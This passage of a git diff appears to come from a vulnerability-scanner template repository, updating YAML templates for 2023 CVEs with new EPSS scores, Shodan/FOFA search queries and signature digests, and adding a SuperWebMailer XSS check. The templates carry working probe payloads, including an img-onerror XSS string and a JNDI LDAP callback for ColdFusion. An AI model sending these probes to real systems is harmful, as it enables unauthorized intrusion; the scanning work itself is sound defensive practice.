4a0a0047304502204ab9d58c827030307982f2317cf0ef5e0e46c5e54170976febd9ae98ad7c5e62022100c5d29929622fac47b5729e0314b96749a088e78fc9b1eb2ae10b87a7e649ae16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210092e7feb36eb07c8db0b80eaa34f7e592db62d2606ea13aee0a454012c8c50ce8022016de26dfbe4663f37ecdbf2ec8db1d12daf769005479d30d009b3c3939eb020c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37266.yaml b/http/cves/2023/CVE-2023-37266.yaml index f601503116..6093d4aecf 100644 --- a/http/cves/2023/CVE-2023-37266.yaml +++ b/http/cves/2023/CVE-2023-37266.yaml @@ -17,16 +17,20 @@ info: cvss-score: 9.8 cve-id: CVE-2023-37266 cwe-id: CWE-287 - epss-score: 0.07286 - epss-percentile: 0.93418 + epss-score: 0.03237 + epss-percentile: 0.91226 cpe: cpe:2.3:o:icewhale:casaos:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: icewhale product: casaos - shodan-query: http.html:"/CasaOS-UI/public/index.html" - fofa-query: body="/CasaOS-UI/public/index.html" + shodan-query: + - http.html:"/CasaOS-UI/public/index.html" + - http.html:"/casaos-ui/public/index.html" + fofa-query: + - body="/CasaOS-UI/public/index.html" + - body="/casaos-ui/public/index.html" tags: cve2023,cve,oss,casaos,jwt,icewhale variables: jwt_data: '{"iss":"casaos","exp":1790210322,"nbf":1790199522,"iat":1790199522}' @@ -52,4 +56,4 @@ http: - type: json json: - .data.content[].path -# digest: 490a00463044022027971041cce2ae19d7cb8074fb5dc9fdaab73699738e82a5de416cb674e2cecd022005349f9c79dd0692cb3cb08cf619db48fe91f489a6fec5b33874ddb2870f6398:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201f84d8f32e5dcfd5e5bf31c8a7fffdb75a137450b41b9a44d6411e3d9bdf4fe102200c4b424ae537a6dd0585fd40eb6551367a80001f4c01ced749ceca8896431f6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37270.yaml b/http/cves/2023/CVE-2023-37270.yaml index 267e10b816..8756907d78 100644 --- a/http/cves/2023/CVE-2023-37270.yaml +++ b/http/cves/2023/CVE-2023-37270.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2023-37270 cwe-id: CWE-89 - epss-score: 0.01621 - epss-percentile: 0.86175 + epss-score: 0.02538 + epss-percentile: 0.90171 cpe: cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,10 @@ info: vendor: piwigo product: piwigo shodan-query: http.favicon.hash:540706145 + fofa-query: + - icon_hash=540706145 + - title="piwigo" + google-query: powered by piwigo tags: cve2023,cve,piwigo,sqli,authenticated http: @@ -60,4 +64,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022008b98c50259984aac531d4812c005be599db235324a444c7a125dcc0fab0925002200fec9d238e01e18c9a70223ed7e68eea8945c5628b7149aebded1e9259cf169e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a6a02e1cb2a3194dba5cb9b523b522159aa9031c4b0e128b25d329b49f0f031a02210080831c24882155c6b883bc9859412b5c757f154ecb5391d371392cd782232093:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37462.yaml b/http/cves/2023/CVE-2023-37462.yaml index 0cb459af4b..912fd80b4d 100644 --- a/http/cves/2023/CVE-2023-37462.yaml +++ b/http/cves/2023/CVE-2023-37462.yaml @@ -13,20 +13,24 @@ info: - https://github.com/xwiki/xwiki-platform/commit/d9c88ddc4c0c78fa534bd33237e95dea66003d29 - https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-h4vp-69r8-gvjg - https://jira.xwiki.org/browse/XWIKI-20457 + - https://github.com/fkie-cad/nvd-json-data-feeds classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-37462 cwe-id: CWE-74 - epss-score: 0.42489 - epss-percentile: 0.96989 + epss-score: 0.56128 + epss-percentile: 0.97681 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: xwiki product: xwiki - shodan-query: html:"data-xwiki-reference" + shodan-query: + - html:"data-xwiki-reference" + - xwiki + - http.html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" tags: cve2023,cve,xwiki,rce @@ -59,4 +63,4 @@ http: - contains(header_2, "text/html") - status_code_2 == 200 condition: and -# digest: 4a0a0047304502206fe16e183f71cbc3bfc374aaa3ea9730e8d0ed6830941bbdd8bd018d5787f8a0022100fc4ad26f98267cab592d1c2067bd512bb432d6a75b44b068e975176fd45401eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aca35384b1e0a8638525064c8989b40a375b26322a9780252e1417303626f85e02205ce480fe0365ba3a5aea38fa1a825cde0856de2a2023d287e79e397a41f4121b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37474.yaml b/http/cves/2023/CVE-2023-37474.yaml index 1c2f14d4ef..c9233a7022 100644 --- a/http/cves/2023/CVE-2023-37474.yaml +++ b/http/cves/2023/CVE-2023-37474.yaml @@ -17,14 +17,17 @@ info: cvss-score: 7.5 cve-id: CVE-2023-37474 cwe-id: CWE-22 - epss-score: 0.04155 - epss-percentile: 0.91315 + epss-score: 0.05882 + epss-percentile: 0.93414 cpe: cpe:2.3:a:copyparty_project:copyparty:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: copyparty_project product: copyparty + shodan-query: http.title:"copyparty" + fofa-query: title="copyparty" + google-query: intitle:"copyparty" tags: cve,cve2023,packetstorm,traversal,copyparty,copyparty_project http: @@ -41,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ca5945dbf47943040f2934f8e61572c444140181a2cd484157f8e613510793ab02205adca55c099f7c849eb2adfdc1ce94a13d7c7d7c952dae099947665f691df30b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a3d764f1deaab0a74aa395664d2c03375128689f44db8ac4feaf8922dc7865e5022031daff978d8f50006c44303b8278c4488897eea780a082bd4bae73abcda826f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37580.yaml b/http/cves/2023/CVE-2023-37580.yaml index d956cb2bee..8a33866573 100644 --- a/http/cves/2023/CVE-2023-37580.yaml +++ b/http/cves/2023/CVE-2023-37580.yaml @@ -21,14 +21,16 @@ info: cvss-score: 6.1 cve-id: CVE-2023-37580 cwe-id: CWE-79 - epss-score: 0.30373 - epss-percentile: 0.96831 + epss-score: 0.30867 + epss-percentile: 0.96974 cpe: cpe:2.3:a:zimbra:zimbra:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: zimbra product: zimbra - shodan-query: http.favicon.hash:475145467 + shodan-query: + - http.favicon.hash:475145467 + - http.favicon.hash:"475145467" fofa-query: icon_hash="475145467" tags: cve2023,cve,zimbra,xss,authenticated,kev @@ -61,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f8826a6a2aea8b8fdf4bfc526ec4eaf6e1a0613d805ba05235b18095a7a5796b0220449dc6d5f9a0d9bba00cbcd3d271d7ea2cd057ea1993f5acadaeb5edc012f478:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022048e3c2c16faae78f075fb3316202679a06f3ca15d9e665cf8b6865292449a1200221009e80beed07909007baf52bc9724dcc11c5b3700428afd7875003fa9b6fb5ce67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37629.yaml b/http/cves/2023/CVE-2023-37629.yaml index 6ccd550087..c2bacff0ca 100644 --- a/http/cves/2023/CVE-2023-37629.yaml +++ b/http/cves/2023/CVE-2023-37629.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-37629 cwe-id: CWE-434 - epss-score: 0.13221 - epss-percentile: 0.95417 + epss-score: 0.09817 + epss-percentile: 0.94811 cpe: cpe:2.3:a:simple_online_piggery_management_system_project:simple_online_piggery_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true @@ -27,7 +27,6 @@ info: vendor: simple_online_piggery_management_system_project product: simple_online_piggery_management_system tags: cve2023,cve,fileupload,rce,opms,intrusive,simple_online_piggery_management_system_project - variables: string: "CVE-2023-37629" @@ -85,4 +84,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "successfully created")' condition: and -# digest: 4a0a00473045022059a2c7c448168f275b677d59ae6772e136b5cae38b3de5aec573a0498d7353b5022100b9e76c5236c7c11bb720146bb88b08f7f6b7945adc1c103571628437c4f2262e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206452761da1ebb71b5a2a85b17082354777b0f30a6d38f593ff0fd444629930430221008ec0e5895d41eaf6753d851aafa270e8bfdae54dc65c302ae5e25926af894564:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3765.yaml b/http/cves/2023/CVE-2023-3765.yaml index 383af58111..fd1e978a23 100644 --- a/http/cves/2023/CVE-2023-3765.yaml +++ b/http/cves/2023/CVE-2023-3765.yaml @@ -20,8 +20,8 @@ info: cvss-score: 10 cve-id: CVE-2023-3765 cwe-id: CWE-36 - epss-score: 0.00951 - epss-percentile: 0.82826 + epss-score: 0.01303 + epss-percentile: 0.85869 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,10 @@ info: vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" + fofa-query: + - title="mlflow" + - app="mlflow" + google-query: intitle:"mlflow" tags: cve2023,cve,mflow,lfi,huntr,lfprojects http: @@ -53,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200a917400368cfdba77d790147d84d75dde69c698ea1f50eb87e2e46ef3802e6702204a6951c6f20cf4e0722ad2424746f227dd1fb1172fe5f7e624c00010f826aa2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201910ec22d88633834d3b0e067f4ca52c741436df0af9382e716b0f2231fca6d802204e5c9c7c0e8f552ad62f76fd94a3f8d15d8b7fda116fe58cd0b07669005360ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37679.yaml b/http/cves/2023/CVE-2023-37679.yaml index 0dc83540b4..e95420e167 100644 --- a/http/cves/2023/CVE-2023-37679.yaml +++ b/http/cves/2023/CVE-2023-37679.yaml @@ -11,21 +11,26 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2023-37679 - http://mirth.com - http://nextgen.com + - http://packetstormsecurity.com/files/176920/Mirth-Connect-4.4.0-Remote-Command-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-37679 cwe-id: CWE-77 - epss-score: 0.07033 - epss-percentile: 0.93304 + epss-score: 0.07052 + epss-percentile: 0.9396 cpe: cpe:2.3:a:nextgen:mirth_connect:4.3.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: nextgen product: mirth_connect - shodan-query: title:"mirth connect administrator" - tags: cve2023,cve,nextgen,rce + shodan-query: + - title:"mirth connect administrator" + - http.title:"mirth connect administrator" + fofa-query: title="mirth connect administrator" + google-query: intitle:"mirth connect administrator" + tags: packetstorm,cve2023,cve,nextgen,rce http: - raw: @@ -71,4 +76,4 @@ http: regex: - '(.*)' internal: true -# digest: 4a0a00473045022100ae8a56772a4bdf5d579c5a73fbfb6039c2a9d3907cbd13cc12f77a507b42ac6202204915a2338b893189e1f666a217b8e10ce060bab542e3ecb50151f15b2ff37559:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210090fa6ea3074ddefab156454bac75d98ecf2afccb77df469b6769e05ce26989a402201089a4c18eb1d115bde79688a15cbd51dacae795376dc2c19bde505d32158c91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37728.yaml b/http/cves/2023/CVE-2023-37728.yaml index d9ffe9ebbf..583a82abac 100644 --- a/http/cves/2023/CVE-2023-37728.yaml +++ b/http/cves/2023/CVE-2023-37728.yaml @@ -17,15 +17,21 @@ info: cvss-score: 6.1 cve-id: CVE-2023-37728 cwe-id: CWE-79 - epss-score: 0.00259 - epss-percentile: 0.65066 + epss-score: 0.0035 + epss-percentile: 0.71791 cpe: cpe:2.3:a:icewarp:icewarp:10.2.1:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: icewarp product: icewarp - shodan-query: http.favicon.hash:2144485375 + shodan-query: + - http.favicon.hash:2144485375 + - http.title:"icewarp" + fofa-query: + - title="icewarp" + - icon_hash=2144485375 + google-query: intitle:"icewarp" tags: cve,cve2023,icearp,icewarp,xss http: @@ -43,4 +49,4 @@ http: - 'contains(header, "IceWarp") || contains(body, "IceWarp WebClient")' - 'contains(body, "")' condition: and -# digest: 4b0a00483046022100dd2b30d77bd7fdbf38132b03bf1799f609b6434de967ef4df2ad9a875f78a1a7022100b3979a2c39405f62a7af632bf637171fd653ed4121ee891ddabc6d19b422be6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c1039a707e093f50dc7ad75f85cd8933914227dbd16cc520cdea48b2fa5173460221009640d40fea17c786d19eb1047f3543f11316fd30a90a101b9177a8c109a751cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37979.yaml b/http/cves/2023/CVE-2023-37979.yaml index 79489bac76..30f4b75b44 100644 --- a/http/cves/2023/CVE-2023-37979.yaml +++ b/http/cves/2023/CVE-2023-37979.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-37979 cwe-id: CWE-79 epss-score: 0.00085 - epss-percentile: 0.34736 + epss-percentile: 0.3599 cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,6 +27,8 @@ info: vendor: ninjaforms product: ninja_forms framework: wordpress + shodan-query: http.html:/wp-content/plugins/ninja-forms/ + fofa-query: body=/wp-content/plugins/ninja-forms/ publicwww-query: /wp-content/plugins/ninja-forms/ tags: cve2023,cve,wpscan,packetstorm,xss,wordpress,authenticated,wp-plugin,wp,ninjaforms @@ -52,4 +54,4 @@ http: - 'contains(body_2, "") && contains(body_2, "import_form_template")' - 'status_code_2 == 200' condition: and -# digest: 4a0a004730450220353eff964c533a49e3c19d5bb0058b18616fc012d2fdba215438ed89028e46fe022100f8f7ba5442e1e6c4a9f638ce048f7fd25f8e3b8bf43e6f77c3b3226be5003f2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022051ec230e42ab3d71b2df53e401ba10a6682241d7989e90d7011432f85b6c166902210084f6c6e8762f3a08a4ccce739038532489a572defba5e4e59c17d34a9470de42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-38035.yaml b/http/cves/2023/CVE-2023-38035.yaml index 8ce4a8ecd9..8dd3132c61 100644 --- a/http/cves/2023/CVE-2023-38035.yaml +++ b/http/cves/2023/CVE-2023-38035.yaml @@ -21,15 +21,18 @@ info: cvss-score: 9.8 cve-id: CVE-2023-38035 cwe-id: CWE-863 - epss-score: 0.97187 - epss-percentile: 0.99782 + epss-score: 0.97506 + epss-percentile: 0.99983 cpe: cpe:2.3:a:ivanti:mobileiron_sentry:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: ivanti product: mobileiron_sentry - shodan-query: 'html:"Note: Requires a local Sentry administrative user"' + shodan-query: + - 'html:"Note: Requires a local Sentry administrative user"' + - 'http.html:"note: requires a local sentry administrative user"' + fofa-query: 'body="note: requires a local sentry administrative user"' tags: cve2023,cve,packetstorm,ivanti,mobileiron,sentry,kev,rce,auth-bypass,oast variables: oast: "{{interactsh-url}}/?" @@ -51,4 +54,4 @@ http: - contains(interactsh_protocol, 'dns') - status_code == 200 condition: and -# digest: 4b0a00483046022100e9856a868993faad7af5c56725bd8696e4de74eea2c24b5ad1ba5f8877d76563022100b1d699ee80eddd7171d4ef25f622d44a5c87142dd41afd820d4ad1ff2b9b70b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022026cbfee688ff707e0e6ae8f29561501c0afcef82082d08c908b8e472fc2996510220382f1c7435050c40184e851419313a2b2ed4b1a086ba148c9ea2ffa273ffd6c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-38194.yaml b/http/cves/2023/CVE-2023-38194.yaml new file mode 100644 index 0000000000..46dad2ac69 --- /dev/null +++ b/http/cves/2023/CVE-2023-38194.yaml @@ -0,0 +1,46 @@ +id: CVE-2023-38194 + +info: + name: SuperWebMailer - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + An issue was discovered in SuperWebMailer 9.00.0.01710 that allows keepalive.php XSS via a GET parameter. + impact: | + Successful exploitation could allow an attacker to execute malicious scripts in the context of a user's browser, leading to potential data theft or account compromise. + remediation: | + Implement input validation and output encoding to prevent XSS attacks in the SuperWebMailer keepalive.php script. + reference: + - https://herolab.usd.de/security-advisories/usd-2023-0013/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-38194 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-38194 + cwe-id: CWE-79 + epss-score: 0.00046 + epss-percentile: 0.15636 + cpe: cpe:2.3:a:superwebmailer:superwebmailer:9.00.0.01710:*:*:*:*:*:*:* + metadata: + max-request: 1 + verified: true + vendor: superwebmailer + product: superwebmailer + shodan-query: title:"SuperWebMailer" + tags: cve,cve2023,superwebmailer,xss + +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/keepalive.php?caller=%22%3E%3Cimg+src%3d1+onerror%3dalert(document.domain)+%2F%3E&uq_mt=1664137650.085" + + matchers: + - type: dsl + dsl: + - 'contains(body_2, "")' + - 'contains(tolower(body_1), "superwebmailer")' + - 'contains(header_2, "text/html")' + - 'status_code_2 == 200' + condition: and +# digest: 4a0a004730450221009a1a97d60d7b7c57df8826164505d09ec5c7d5cc478cb403655ef61e1ebd1ecc02203aa006f1ef4aa619fc4a2cc86edf00014ad8c66b585e5d1d8e98faa109232263:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-38203.yaml b/http/cves/2023/CVE-2023-38203.yaml index 742e2bdbf6..f56ed775d3 100644 --- a/http/cves/2023/CVE-2023-38203.yaml +++ b/http/cves/2023/CVE-2023-38203.yaml @@ -19,17 +19,24 @@ info: cvss-score: 9.8 cve-id: CVE-2023-38203 cwe-id: CWE-502 - epss-score: 0.517 - epss-percentile: 0.97465 + epss-score: 0.97037 + epss-percentile: 0.99755 cpe: cpe:2.3:a:adobe:coldfusion:2018:-:*:*:*:*:*:* metadata: max-request: 1 vendor: adobe product: coldfusion - shodan-query: http.component:"Adobe ColdFusion" - fofa-query: app="Adobe-ColdFusion" + shodan-query: + - http.component:"Adobe ColdFusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - app="Adobe-ColdFusion" + - app="adobe-coldfusion" + - title="coldfusion administrator login" + google-query: intitle:"coldfusion administrator login" tags: cve,cve2023,adobe,rce,coldfusion,deserialization,kev - variables: callback: "{{interactsh-url}}" jndi: "ldap%3a//{{callback}}/zdfzfd" @@ -49,4 +56,4 @@ http: - contains(interactsh_protocol, "dns") - contains(body, "ColdFusion documentation") condition: and -# digest: 490a0046304402203c66abf1d15e27f2367ab893430e1e93755ed0bc0192120015a9ccd034b1c5e3022056f16b7ba4c51d0bd6e741d47e92f84e7d7e63c54708dd3600bb37c9789e887a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022000a2f86e0dc0ac031266f79d23033c2272a377adade2e9030da5fbace145ecf9022078f0527055b2c7d6342cdfbe71c8c27c616fe82f89680ef3a7534f8b9215ea14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-38205.yaml b/http/cves/2023/CVE-2023-38205.yaml index 2eed763b87..eb7b306e79 100644 --- a/http/cves/2023/CVE-2023-38205.yaml +++ b/http/cves/2023/CVE-2023-38205.yaml @@ -20,16 +20,24 @@ info: cvss-score: 7.5 cve-id: CVE-2023-38205 cwe-id: CWE-284,NVD-CWE-Other - epss-score: 0.93471 - epss-percentile: 0.99038 + epss-score: 0.922 + epss-percentile: 0.98936 cpe: cpe:2.3:a:adobe:coldfusion:2018:-:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: adobe product: coldfusion - shodan-query: http.component:"Adobe ColdFusion" - fofa-query: app="Adobe-ColdFusion" + shodan-query: + - http.component:"Adobe ColdFusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - app="Adobe-ColdFusion" + - app="adobe-coldfusion" + - title="coldfusion administrator login" + google-query: intitle:"coldfusion administrator login" tags: cve2023,cve,adobe,auth-bypass,coldfusion,kev http: @@ -49,4 +57,4 @@ http: - status_code == 200 - len(trim_space(body)) == 106 condition: and -# digest: 4a0a00473045022100e2618a3728707739f3a031285e196d3b43d5bf03d3f4e6e53e28d654b97d694602203d8fd37c306cee28bd1c86e457dbde123a4af70c48824d8539dca9d6e6106e1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201f5fd9a02579626ad771cd958b812d81f7437cd219608ff2278a49d19d8b39db022004b6c8ed6549e3ca95af554a4353d5c3c96430d5b7edc2eeba257d5eb387a2e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3836.yaml b/http/cves/2023/CVE-2023-3836.yaml index 0e3e21c1d4..57e6279975 100644 --- a/http/cves/2023/CVE-2023-3836.yaml +++ b/http/cves/2023/CVE-2023-3836.yaml @@ -13,21 +13,27 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2023-3836 - https://vuldb.com/?ctiid.235162 - https://vuldb.com/?id.235162 + - https://github.com/1f3lse/taiE classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-3836 cwe-id: CWE-434 - epss-score: 0.02584 - epss-percentile: 0.89161 + epss-score: 0.02637 + epss-percentile: 0.90348 cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: dahuasecurity product: smart_parking_management - shodan-query: html:"/WPMS/asset" - zoomeye-query: /WPMS/asset + shodan-query: + - html:"/WPMS/asset" + - http.html:"/wpms/asset" + fofa-query: body="/wpms/asset" + zoomeye-query: + - /WPMS/asset + - /wpms/asset tags: cve2023,cve,dahua,fileupload,intrusive,rce,dahuasecurity variables: random_str: "{{rand_base(6)}}" @@ -65,4 +71,4 @@ http: part: body_1 regex: - 'ico_res_(\w+)_on\.jsp' -# digest: 490a00463044022019ed3a01869b520c888624caac663690abb0239bbe29ce2bd37bf0c9da3ceed102203bb8f2aef38ca4aa0349fe47f7a0e72a004678a13fb247d0ebd2abfbea426827:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220606c5846c5be25299de2a61ac01659ecdc2fc59f93bb1fcbb37539019ae3f2a402201b12673926f6779f78f43767a9477ebc411e61312751f4bc04a088b79a22e6d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3843.yaml b/http/cves/2023/CVE-2023-3843.yaml index 64bd0a4275..064fde68dd 100644 --- a/http/cves/2023/CVE-2023-3843.yaml +++ b/http/cves/2023/CVE-2023-3843.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-3843 cwe-id: CWE-79 epss-score: 0.00235 - epss-percentile: 0.60949 + epss-percentile: 0.61597 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true @@ -38,4 +38,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, ">w71ch") && contains(body, "mooDating")' condition: and -# digest: 4a0a00473045022027cd912e53fe3d0f2326275dd4ccade28bab4684b50300171df9b865796e73be022100a4a0c5e64721b43ab72868d32738f431adf44fa42083842dc9faa71541da7677:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f8e2700b8f5be675dc9f95b5ea57b298a1168058d65a5eca4293bdb3e2c29d8602203a7928ef43f783f95a42125895d5ef3073b7d99808f8989d5c24611901a67565:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-38433.yaml b/http/cves/2023/CVE-2023-38433.yaml index f12d8cd284..045eaada97 100644 --- a/http/cves/2023/CVE-2023-38433.yaml +++ b/http/cves/2023/CVE-2023-38433.yaml @@ -19,15 +19,17 @@ info: cvss-score: 7.5 cve-id: CVE-2023-38433 cwe-id: CWE-798 - epss-score: 0.0029 - epss-percentile: 0.6843 + epss-score: 0.0031 + epss-percentile: 0.69984 cpe: cpe:2.3:o:fujitsu:ip-he950e_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: fujitsu product: ip-he950e_firmware - shodan-query: '"Server: thttpd/2.25b 29dec2003" content-length:1133' + shodan-query: + - '"Server: thttpd/2.25b 29dec2003" content-length:1133' + - '"server: thttpd/2.25b 29dec2003" content-length:1133' max-req: 1 tags: cve2023,cve,fujitsu,ip-series @@ -57,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210092efe2f7cbaa87951776951c53fc173d616cbec9006b475bef3a28d4e713c0a302204f45c907afe1173bcb87289b260f05e5301354aa04df9c0b878d45914e35b075:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220339e122342e81795d73baca010a14f5f18ebda3889eb36b5df9ad2052cc451f90220310bcf82220b0bcebf3650c9eed525433112c6c74a38dfdced33aecf17eb6784:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3844.yaml b/http/cves/2023/CVE-2023-3844.yaml index 0b8ad635ce..b52fb478fb 100644 --- a/http/cves/2023/CVE-2023-3844.yaml +++ b/http/cves/2023/CVE-2023-3844.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-3844 cwe-id: CWE-79 epss-score: 0.00235 - epss-percentile: 0.60949 + epss-percentile: 0.61597 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true @@ -38,4 +38,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, ">r5c3m", "mooDating")' condition: and -# digest: 4a0a00473045022100dbb95798feea3cf7aaba17b4e5abd88edc10d3800e4bcb3e7f11fb62502fd79d02206cb3514a3aef06831a5a7df5e2ffdf89867957a0dee2da8461dd34c830010db4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009f69075a464598a34eab0d4fff63de5ca62fdaeadee27ae389cd996c9acf94ad022027d9aa27c168feeaef2be1a802c4093742779dd96d6219ee1ce9f8e6fad52c25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3845.yaml b/http/cves/2023/CVE-2023-3845.yaml index a73a85af29..bf01b42796 100644 --- a/http/cves/2023/CVE-2023-3845.yaml +++ b/http/cves/2023/CVE-2023-3845.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-3845 cwe-id: CWE-79 epss-score: 0.00235 - epss-percentile: 0.60949 + epss-percentile: 0.61597 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true @@ -38,4 +38,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, ">", "mooDating")' condition: and -# digest: 4b0a00483046022100e52e37ba7cbb0809f204d6bf85295214994040f499549c02451dc287877adeb5022100e6f6a88c449847bf9aa171e91057daa40d93e1f86e2123e04355ff621d74b68e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205e7b8940c3c99b564b4bddcd3a0a632bf8982f159d113a5fc4831416ed9e1a9e02200a4ef1d7ed1aef86a0ae2b23f751fe37b70b48ba7b55de80e1185477b905c0ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3847.yaml b/http/cves/2023/CVE-2023-3847.yaml index 0480cddc9c..b112ba8913 100644 --- a/http/cves/2023/CVE-2023-3847.yaml +++ b/http/cves/2023/CVE-2023-3847.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-3847 cwe-id: CWE-79 epss-score: 0.00235 - epss-percentile: 0.60949 + epss-percentile: 0.61597 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true @@ -39,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, ">","mooDating")' condition: and -# digest: 4a0a0047304502210095ca1683def9b0c91047311e6f9ac37e0cead694dff6725f35ea1656e831b3ae02205ee54ee3b2a7ac6698d824c665300872a060654f713a6fa82658a6734360c28d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# 